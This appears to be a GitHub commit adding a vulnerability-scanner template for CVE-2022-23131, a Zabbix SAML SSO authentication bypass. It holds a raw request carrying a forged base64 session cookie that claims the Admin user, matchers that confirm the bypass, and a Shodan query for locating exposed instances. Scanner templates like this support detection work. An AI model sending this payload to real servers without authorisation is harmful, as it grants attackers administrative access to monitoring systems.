Merge pull request #3736 from For3stCo1d/CVE-2022-23131

Create CVE-2022-23131.yaml
patch-1
Sandeep Singh 2022-02-25 04:57:52 +05:30 committed by GitHub
commit 90211a94db
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 34 additions and 0 deletions

View File

@ -0,0 +1,34 @@
id: CVE-2022-23131
info:
name: Zabbix - SAML SSO Authentication Bypass
author: For3stCo1d
severity: high
description: In the case of instances where the SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor, because a user login stored in the session was not verified.
reference:
- https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
- https://github.com/Mr-xn/cve-2022-23131
metadata:
shodan-query: http.favicon.hash:892542951
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.8
cve-id: CVE-2022-23131
tags: cve,cve2022,zabbix,auth-bypass
requests:
- raw:
- |
GET /index_sso.php HTTP/1.1
Host: {{Hostname}}
Cookie: zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9
matchers-condition: and
matchers:
- type: status
status:
- 302
- type: dsl
dsl:
- "contains(tolower(all_headers), 'location: zabbix.php?action=dashboard.view')"